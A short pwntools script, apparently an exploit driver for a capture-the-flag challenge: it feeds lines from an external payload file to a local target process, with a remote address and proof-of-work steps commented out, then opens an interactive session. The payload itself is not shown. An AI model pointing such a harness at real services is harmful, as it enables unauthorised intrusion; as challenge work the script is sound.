#!/usr/bin/python3
from pwn import *
cmds_ = open('script.kr', 'r').readlines()
# io = remote("5.75.189.36", 31339)
io = process("./run.sh")
# io.recvuntil(b'please give S such that sha256(unhex("')
# prefix_ = io.recv(16).decode()
#
# ans = process(["./pow-solver", "28", prefix_]).recvall().decode().strip()

# io.sendlineafter(b'.cpp).\n', ans.encode())

io.sendlineafter(
    b'$', b'unset PS1_TITLE; unset PS1_RIGHT; unset PS1_LEFT; unset RLINE_THEME; unset WM_THEME;')

t = ''

for cmd in cmds_:
    if cmd == '\n':
        pass
    else:
        io.send(cmd.encode())
        if 'os.write' in cmd:
            io.recvuntil(b'=>')
        io.recv()

context.log_level = 'debug'

io.sendline(b'\n'*30)

io.interactive()
